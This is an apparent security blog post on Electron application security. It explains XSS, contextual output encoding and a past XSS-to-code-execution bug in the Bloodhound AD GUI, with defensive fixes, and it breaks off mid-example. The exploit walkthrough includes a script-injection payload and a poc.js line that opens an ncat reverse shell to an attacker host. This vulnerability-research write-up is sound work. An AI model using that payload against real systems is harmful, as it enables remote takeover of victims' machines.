
Reasonably Secure Electron

Although the Electron framework has gained popularity in recent years for simplifying desktop application development, many still consider it inherently insecure. This blog examines how various Electron exploits work and how to effectively design applications that can defend against current and future attacks. A functional example of a “reasonably secure” Electron application pattern is available on GitHub.

Preface

"In the face of ambiguity, refuse the temptation to guess."
-The Zen of Python

Electron is a cross-platform framework for developing desktop applications using web technologies like HTML, JavaScript, and CSS. Electron has become very popular in recent years for its ease of use, empowering developers to quickly create generally good-looking, responsive, cross-platform desktop applications. Applications from major tech companies like Microsoft Teams, VSCode, Slack, Atom, Spotify, and even secure messaging apps like Signal all use Electron or similar "native web" application frameworks. Electron did not start this trend — embedded webviews have been around for some time. For example, iMessage is developed using embedded WebKit webviews, which have been available on macOS and iOS for years. Similarly, JavaFX supports embeddable WebKit, and Windows has IE objects that can be embedded in third-party applications. For one reason or another, Electron applications (unlike the others) often garner a fervent hatred, but truth be told, Electron remains a viable and pragmatic choice for those who value development time more than their users' RAM.

Electron is also often regarded as "inherently insecure." While this reputation is not entirely undeserved, solid engineering practices can offset risky design choices. Take PHP, for example: it is possible to write secure PHP code, but due to the language's often unintuitive design, it's not easy (and yes, I'm aware a lot of this was fixed in PHP 7, but it's fun to beat a dead horse). Keeping that in mind, experience has taught me that teaching doesn't scale. If you want to stop SQL injection across your organization, you're better off creating internal APIs and libraries that do not allow SQL injection to occur than teaching all of your developers about SQL injection (better yet, do both). Similarly, it's possible to write secure Electron applications, and we can even create application architectures that help developers avoid Electron's pitfalls.
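
To illustrate the "safe internal API" idea with SQL injection specifically, here's a minimal sketch using the node-postgres (pg) client; the findUserByName() wrapper is hypothetical, and the point is simply that callers never get to concatenate SQL themselves:

const { Pool } = require('pg');
const pool = new Pool();

// Unsafe: string interpolation lets callers (and attackers) inject SQL.
// pool.query(`SELECT * FROM users WHERE name = '${name}'`);

// Safer internal API: the query text is fixed and values are passed as
// parameters, so callers cannot introduce SQL injection even by accident.
function findUserByName(name) {
  return pool.query('SELECT * FROM users WHERE name = $1', [name]);
}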

In Part 1 we'll examine how various Electron exploitation techniques work, focusing primarily on cross-site scripting. In Part 2 we'll dive into how to design applications that can defend against these types of attacks, including a functional example pattern that's reasonably secure. Part 2 is based on lessons learned from building the (yet unreleased) GUI for Sliver, an implant framework for red teams that Ronan Kervella and I have been building in our spare time.


Part 1 - Out of the Browser Into the Fire

Since Electron applications are built on web application technologies, it’s no surprise that they’re often vulnerable to the same flaws found in your everyday web application. In the past, web application flaws have generally been confined to the browser's sandbox, but no such limitations exist (by default) in Electron. This change has led to a significant increase in the impact that a cross-site scripting (XSS) bug can have, since the attacker now gains access to the NodeJS APIs. Back in 2016, Matt Bryant, Shubs Shah, and I released some research on finding and exploiting these vulnerabilities in Electron and other native web frameworks. We demonstrated remote code execution vulnerabilities in Textual IRC, Azure Storage Explorer, and multiple markdown editors, as well as a flaw that allowed remote disclosure of all iMessage data on macOS, and created a cross-platform self-propagating worm in RocketChat in our presentation at Kiwicon.

But what is the root cause of XSS, and why is it so hard to prevent? There's a common misconception that the proper fix for a cross-site scripting vulnerability is sanitizing user input. The notion that sanitizing user input can concretely fix an XSS issue is untrue; the only proper fix for XSS is contextual output encoding. Of course it's still a good idea to sanitize user input, so do that too (with a whitelist, not a blacklist), but do it in addition to proper output encoding. A good rule of thumb is: "sanitize input, encode output." But what does contextual encoding entail? Let's explore the details of a couple of recent exploits to better understand how XSS manifests and how to prevent it.
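
To make "contextual" concrete, here's a quick sketch (htmlEncode() is a hypothetical helper that only escapes <, > and &) showing why one encoding can't be blindly applied to every context:

const userValue = "';alert(1);//";

// HTML context: entity encoding is the right tool, the payload can never
// open a tag here.
const markup = `<div>${htmlEncode(userValue)}</div>`;

// JavaScript string context: the same encoding is useless, the payload
// breaks out of the string literal without ever using < or >.
const inlineScript = `<script>var name = '${htmlEncode(userValue)}';</script>`; // still exploitable

The right encoding depends entirely on where the value lands: HTML body, HTML attribute, JavaScript string, URL, and so on each require different treatment.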

Bloodhound AD

We'll first look at a couple vulnerabilities I found in the Bloodhound AD tool, one of which was independently discovered by Fab.

Bloodhound is an incredibly powerful tool for analyzing the structure of Windows Active Directory deployments, and finding ways to exploit the various privilege relationships therein. To start, the attacker (or defender) runs an ingestor script that dumps data from Active Directory into JSON. The JSON is then parsed into a Neo4j database, and an Electron GUI can be used to query and view the results in a nice graph view. A quick look at the code reveals the application is primarily based on React. React, generally speaking and for reasons we'll discuss later, is very good at preventing cross-site scripting attacks, but edge cases do exist. Such an edge case is the use of the dangerouslySetInnerHTML() function. This function is similar in functionality to a DOM element's .innerHTML (also dangerous); the function takes in a string and parses it as HTML.
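
For those less familiar with the API, a contrived sketch of both sinks (the component and variable names here are made up for illustration):

// Plain DOM sink: whatever is in `userInput` gets parsed as HTML.
document.querySelector('#info').innerHTML = userInput;

// React equivalent: dangerouslySetInnerHTML expects an object with an
// `__html` key, and that string is likewise parsed as HTML.
const InfoPanel = ({ userInput }) => (
  <div dangerouslySetInnerHTML={{ __html: userInput }} />
);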

Using candidate point analysis, we first perform a quick search of the unpatched Bloodhound AD codebase and find four instances of this function being used, one excerpt below:

HelpModal.jsx
<Modal.Body>
  <Tabs
    defaultActiveKey={1}
    id='help-tab-container'
    justified
  >
    <Tab
      eventKey={1}
      title='Info'
      dangerouslySetInnerHTML={this.state.infoTabContent}
    />

In the excerpt above we can see an attribute of the this.state object is passed to our candidate point dangerouslySetInnerHTML(). From this sink, we'll trace backwards to determine whether the issue is exploitable. Looking at the definition of this.state, we can see that it's a basic JavaScript object initialized with empty strings, including the .infoTabContent attribute, which is passed as a parameter to our sink:

HelpModal.jsx
export default class HelpModal extends Component {
  constructor() {
    super();
    this.state = {
      open: false,
      infoTabContent: '',
      abuseTabContent: '',
      opsecTabContent: '',
      referencesTabContent: '',
    };

So next we must determine how .infoTabContent is set. Jumping to the next usage of infoTabContent, we find:

HelpModal.jsx
this.setState({ infoTabContent: { __html: formatted } });

Here we see the empty string infoTabContent is replaced with a JavaScript object with the key __html; this aligns with React's documentation of how dangerouslySetInnerHTML works and is a good indication that we've correctly traced the code and that this value is indeed passed to our sink. The __html key's value is the formatted variable, so from here we must determine what that variable is and what it contains. Scrolling up a bit, we can see that formatted is just a string, built using string interpolation with the variables ${sourceName} and ${targetName}:

HelpModal.jsx
} else if (edge.label === 'SQLAdmin') {
  formatted = `The user ${sourceName} is a SQL admin on the computer ${targetName}.
    There is at least one MSSQL instance running on ${targetName} where the user
    ${sourceName} is the account configured to run the SQL Server instance.

Based on my usage and understanding of the tool, and as the help dialog helpfully points out, these values come from the data collected by the ingestor script from Active Directory (i.e., from an 'untrusted' source) and are therefore "attacker"-controlled (note the ironic inversion of 'attacker' in this context). This confirms the exploitability of our candidate point; attacker-controlled content is indeed passed to dangerouslySetInnerHTML. All an attacker needs to do is plant a malicious value (like the GPO in Fab's demonstration) with a name such as:

aaaaaa<SCRIPT SRC="http://example.com/poc.js">

Where poc.js contains:

const { spawn } = require('child_process');

spawn('ncat', ['-e', '/bin/bash', '<attacker host>', '<some port>']);

Since the GPO name is not properly encoded, it will be rendered by the DOM as HTML, and Electron will parse the <script> tag and dutifully retrieve and execute the contents of poc.js. As discussed before, since the NodeJS APIs are enabled, this attacker-controlled JavaScript can simply spawn a Bash child process and execute arbitrary native code on the machine.
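
For context, the renderer only has the NodeJS APIs because of how the BrowserWindow is configured; older Electron versions enabled Node integration by default. A sketch of what such a window setup looks like (not Bloodhound's actual code):

const { app, BrowserWindow } = require('electron');

app.on('ready', () => {
  const win = new BrowserWindow({
    // With nodeIntegration enabled, any script running in this renderer,
    // including an injected XSS payload, can require('child_process').
    webPreferences: { nodeIntegration: true },
  });
  win.loadFile('index.html');
});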

A reasonable scenario for this exploit would be a blue team hiding malicious values in their AD deployment, waiting for the red team to run Bloodhound, and subsequently exploiting the red team operator's machine. From the opposite side, a red team operator in a position to influence the data collected by Bloodhound (but with otherwise limited access to AD) could exploit this in the traditional direction too.

The most comprehensive fix for this vulnerability would be to rewrite the functionality such that dangerouslySetInnerHTML is not needed. However, from a practical perspective, a lot of code would need to be refactored. A short-term and effective fix is to HTML encode the attacker-controlled variables. By HTML encoding these values, we ensure the strings are never interpreted by the browser as actual HTML, while still supporting arbitrary characters. The prior payload aaaaaa<SCRIPT SRC="http://example.com/poc.js"> will be encoded as aaaaaa&lt;SCRIPT SRC="http://example.com/poc.js"&gt;, which will be displayed as aaaaaa<SCRIPT SRC="http://example.com/poc.js"> but not interpreted as HTML. So is preventing cross-site scripting a simple matter of HTML encoding attacker-controlled values? Unfortunately, no.
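
A sketch of what that short-term fix could look like; the escapeHtml() helper below is illustrative, not Bloodhound's actual patch:

// Illustrative helper, not the actual Bloodhound patch.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

formatted = `The user ${escapeHtml(sourceName)} is a SQL admin on the computer ${escapeHtml(targetName)}. ...`;
this.setState({ infoTabContent: { __html: formatted } });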

In another area of the application, the Mustache template library is used to render tooltips. The Mustache library HTML encodes by default, so another potential fix for the prior vulnerability would be to switch from string interpolation to Mustache templates. However, as we discussed, the proper fix is contextual encoding, not blanket HTML encoding. HTML encoding will prevent XSS in an HTML context, but when used outside of an HTML context it will fail, or only coincidentally prevent XSS.
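
For reference, mustache.js escapes double-brace interpolations by default, while triple braces (or {{& ... }}) emit the raw value; a quick illustration:

const Mustache = require('mustache');
const label = '<SCRIPT SRC="http://example.com/poc.js">';

// {{label}} is HTML-escaped by default, so the tag is rendered as inert text.
Mustache.render('<div class="header">{{label}}</div>', { label });

// {{{label}}} skips escaping and injects the raw string into the output.
Mustache.render('<div class="header">{{{label}}}</div>', { label });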

Looking at the usage of Mustache in Bloodhound, we see that a few values are passed to the tooltips, notably label is attacker-controlled:

nodeTooltip.html
<div class="header">

</div>
<ul class="tooltip-ul">
{